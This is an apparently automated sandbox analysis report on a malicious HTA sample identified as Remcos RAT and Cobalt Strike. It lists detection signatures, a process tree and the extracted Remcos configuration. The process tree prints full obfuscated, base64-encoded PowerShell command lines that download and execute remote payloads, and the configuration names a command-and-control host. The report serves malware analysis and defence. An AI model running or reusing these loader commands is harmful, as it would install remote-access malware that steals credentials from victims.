Windows Analysis Report
clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Overview
General Information
Detection: Cobalt Strike, Remcos
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7372 cmdline: mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 7484 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7528 cmdline: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 7656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 7672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 7728 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- CasPol.exe (PID: 6772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 1220 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- CasPol.exe (PID: 3448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
| | REMCOS_RAT_variants | unknown | unknown | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
| | REMCOS_RAT_variants | unknown | unknown | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems)